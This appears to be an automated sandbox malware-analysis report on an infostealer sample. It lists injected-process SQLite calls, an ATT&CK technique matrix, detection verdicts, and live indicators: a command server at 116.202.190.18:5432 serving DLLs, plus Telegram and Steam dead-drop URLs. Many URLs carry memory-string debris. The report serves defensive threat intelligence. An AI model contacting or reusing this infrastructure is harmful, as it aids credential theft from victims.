                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B764D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_1B764D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B8CB0 sqlite3_bind_zeroblob,2_2_1B6B8CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6F8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_1B6F8200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B764140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_1B764140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6D06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_1B6D06E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6A8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,2_2_1B6A8680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6D8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,2_2_1B6D8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B8430 sqlite3_bind_int64,2_2_1B6B8430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B7810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1B6B7810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B743770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B743770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7637E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B7637E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6AB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,2_2_1B6AB400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6DEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_1B6DEF30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6EE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_1B6EE200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6FE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B6FE170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6EE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1B6EE090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6FA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,2_2_1B6FA6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6966C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_1B6966C0
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                511
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                511
                Process Injection
                LSASS Memory141
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager12
                Process Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                2
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS1
                Account Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                System Owner/User Discovery
                SSHKeylogging13
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials3
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync54
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe26%ReversingLabsWin32.Infostealer.Generic
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://116.202.190.18:5432l0%Avira URL Cloudsafe
                https://116.202.190.18:5432/softokn3.dllP100%Avira URL Cloudmalware
                https://116.202.190.18/100%Avira URL Cloudmalware
                https://116.202.190.18:5432/softokn3.dll100%Avira URL Cloudmalware
                http://ocsp.entrust.net020%Avira URL Cloudsafe
                http://ocsp.entrust.net030%Avira URL Cloudsafe
                https://116.202.190.18:5432/msvcp140.dlldge100%Avira URL Cloudmalware
                https://web.telegram.org0%Avira URL Cloudsafe
                https://116.202.190.18:5432/vcruntime140.dllIQ=E100%Avira URL Cloudmalware
                https://116.202.190.18:5432/softokn3.dllZ100%Avira URL Cloudmalware
                https://116.202.190.18:5432Content-Disposition:0%Avira URL Cloudsafe
                https://116.202.190.18:5432/freebl3.dllEdge100%Avira URL Cloudmalware
                https://116.202.190.18:5432/sqls.dll100%Avira URL Cloudmalware
                https://116.202.190.18:5432/freebl3.dlla100%Avira URL Cloudmalware
                https://116.202.190.18:5432/reebl3.dll100%Avira URL Cloudmalware
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                https://116.202.190.18:5432/mozglue.dllEdge100%Avira URL Cloudmalware
                https://t.me/r8z0l100%Avira URL Cloudmalware
                https://116.202.190.18:5432/freebl3.dll100%Avira URL Cloudmalware
                https://116.202.190.18:5432/vcruntime140.dll9100%Avira URL Cloudmalware
                https://116.202.190.18:5432/nss3.dll100%Avira URL Cloudmalware
                https://116.202.190.18:5432/mozglue.dlls100%Avira URL Cloudmalware
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%Avira URL Cloudsafe
                https://116.202.190.18:5432/vcruntime140.dllser100%Avira URL Cloudmalware
                http://crl.entrust.net/ts1ca.crl00%Avira URL Cloudsafe
                https://t.me/i0%Avira URL Cloudsafe
                https://116.202.190.18:5432/vcruntime140.dll/100%Avira URL Cloudmalware
                https://116.202.190.18:5432/sqls.dllx100%Avira URL Cloudmalware
                https://116.202.190.18:5432/vcruntime140.dll100%Avira URL Cloudmalware
                https://116.202.190.18:5432100%Avira URL Cloudmalware
                https://116.202.190.18:5432/100%Avira URL Cloudmalware
                http://www.sqlite.org/copyright.html.0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://116.202.190.18:5432fold0%Avira URL Cloudsafe
                https://116.202.190.18:5432/.190.18:5432/100%Avira URL Cloudmalware
                https://t.me/w0%Avira URL Cloudsafe
                https://116.202.190.18:5432/oft100%Avira URL Cloudmalware
                http://www.entrust.net/rpa030%Avira URL Cloudsafe
                https://116.202.190.18:5432/My100%Avira URL Cloudmalware
                https://116.202.190.18:5432/nss3.dllO100%Avira URL Cloudmalware
                https://116.202.190.18:5432/mozglue.dll100%Avira URL Cloudmalware
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://116.202.190.18:5432/softokn3.dllOMh100%Avira URL Cloudmalware
                http://aia.entrust.net/ts1-chain256.cer010%Avira URL Cloudsafe
                https://116.202.190.18:5432A0%Avira URL Cloudsafe
                https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
                https://116.202.190.18:5432ing0%Avira URL Cloudsafe
                https://116.202.190.18:5432/nss3.dllft100%Avira URL Cloudmalware
                https://116.202.190.18:5432/msvcp140.dll100%Avira URL Cloudmalware
                https://116.202.190.18:5432/vcruntime140.dllUser100%Avira URL Cloudmalware
                https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
                https://116.202.190.18:5432/ng100%Avira URL Cloudmalware
                https://116.202.190.18:5432/softokn3.dlldge100%Avira URL Cloudmalware
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
                https://steamcommunity.com/profiles/76561199698764354100%Avira URL Cloudmalware
                https://www.entrust.net/rpa00%Avira URL Cloudsafe
                http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
                https://t.me/r8z0lF0%Avira URL Cloudsafe
                https://116.202.190.18:5432AMicrosoft0%Avira URL Cloudsafe
                https://116.202.190.18:5432c84cgle0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                t.me
                149.154.167.99
                truetrue
                  unknown
                  198.187.3.20.in-addr.arpa
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://t.me/r8z0ltrue
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199698764354true
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://116.202.190.18/RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://duckduckgo.com/chrome_newtabFBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/softokn3.dllPRegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://duckduckgo.com/ac/?q=FBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432lRegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://web.telegram.orgRegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/msvcp140.dlldgeRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://ocsp.entrust.net03file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.entrust.net02file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/softokn3.dllRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/vcruntime140.dllIQ=ERegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/freebl3.dllEdgeRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/freebl3.dllaRegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432Content-Disposition:RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/sqls.dllRegAsm.exe, 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/reebl3.dllRegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/softokn3.dllZRegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/mozglue.dllEdgeRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/freebl3.dllRegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/vcruntime140.dll9RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/mozglue.dllsRegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/nss3.dllRegAsm.exe, 00000002.00000002.3326265923.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/vcruntime140.dll/RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/vcruntime140.dllserRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://t.me/iRegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.entrust.net/ts1ca.crl0file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/sqls.dllxRegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/vcruntime140.dllRegAsm.exe, 00000002.00000002.3326524144.0000000001268000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432foldRegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/.190.18:5432/RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoFBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://t.me/wRegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/oftRegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.entrust.net/rpa03file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/nss3.dllORegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/MyRegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/softokn3.dllOMhRegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/mozglue.dllRegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://aia.entrust.net/ts1-chain256.cer01file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432ARegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432ingRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/FBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/msvcp140.dllRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/nss3.dllftRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/vcruntime140.dllUserRegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://ac.ecosia.org/autocomplete?q=FBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432/ngRegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://116.202.190.18:5432/softokn3.dlldgeRegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=FBKECF.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://t.me/r8z0lFRegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.entrust.net/2048ca.crl0file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.entrust.net/rpa0file.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432AMicrosoftRegAsm.exe, 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://116.202.190.18:5432c84cgleRegAsm.exe, 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    116.202.190.18
                    unknownGermany
                    24940HETZNER-ASDEfalse
                    149.154.167.99
                    t.meUnited Kingdom
                    62041TELEGRAMRUtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1453785
                    Start date and time:2024-06-07 17:20:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/11@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 64
                    • Number of non-executed functions: 245
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 93.184.221.240
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    TimeTypeDescription
                    11:21:13API Interceptor1x Sleep call for process: RegAsm.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    116.202.190.18UmMgwOUPt5.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                      KLRA3j95ax.exeGet hashmaliciousVidarBrowse
                        149.154.167.99http://telegram.dogGet hashmaliciousUnknownBrowse
                        • telegram.dog/
                        LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                        • t.me/cinoshibot
                        jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                        • t.me/cinoshibot
                        vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                        • t.me/cinoshibot
                        RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                        • t.me/cinoshibot
                        KeyboardRGB.exeGet hashmaliciousUnknownBrowse
                        • t.me/cinoshibot
                        file.exeGet hashmaliciousCinoshi StealerBrowse
                        • t.me/cinoshibot
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        t.mehttps://xts5.uovuo.com/Get hashmaliciousUnknownBrowse
                        • 149.154.167.99
                        https://drop-manta.pages.dev/Get hashmaliciousUnknownBrowse
                        • 162.159.152.4
                        KLRA3j95ax.exeGet hashmaliciousVidarBrowse
                        • 149.154.167.99
                        https://ikg.nqg.mybluehost.me/autrise.phpGet hashmaliciousUnknownBrowse
                        • 162.241.218.25
                        file.exeGet hashmaliciousVidarBrowse
                        • 149.154.167.99
                        EXTERNAL Action required.msgGet hashmaliciousUnknownBrowse
                        • 162.241.218.226
                        Setup.exeGet hashmaliciousVidarBrowse
                        • 149.154.167.99
                        http://jgt.ygs.mybluehost.me/mimderz/netGet hashmaliciousHTMLPhisherBrowse
                        • 162.241.30.48
                        file.exeGet hashmaliciousVidarBrowse
                        • 149.154.167.99
                        jL8AjRK30O.exeGet hashmaliciousCryptOne, VidarBrowse
                        • 149.154.167.99
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        TELEGRAMRUfile.exeGet hashmaliciousUnknownBrowse
                        • 149.154.167.220
                        file.exeGet hashmaliciousUnknownBrowse
                        • 149.154.167.220
                        CV Elena Alba Garcia.exeGet hashmaliciousAgentTeslaBrowse
                        • 149.154.167.220
                        4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 149.154.167.220
                        https://bb78t.xyz/Get hashmaliciousUnknownBrowse
                        • 149.154.170.96
                        https://xts5.uovuo.com/Get hashmaliciousUnknownBrowse
                        • 149.154.167.99
                        UmMgwOUPt5.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                        • 149.154.167.99
                        pwnp9WrC1wizLDM.exeGet hashmaliciousAgentTeslaBrowse
                        • 149.154.167.220
                        SOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 149.154.167.220
                        CV.exeGet hashmaliciousAgentTeslaBrowse
                        • 149.154.167.220
                        HETZNER-ASDEUpdate.jsGet hashmaliciousSocGholishBrowse
                        • 5.161.229.58
                        Product Order Inquiry 37674309.exeGet hashmaliciousAgentTeslaBrowse
                        • 188.40.22.244
                        PO 23897 Order Request.exeGet hashmaliciousAgentTeslaBrowse
                        • 88.99.81.131
                        skid.arm.elfGet hashmaliciousMirai, MoobotBrowse
                        • 46.4.110.37
                        UmMgwOUPt5.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                        • 116.202.190.18
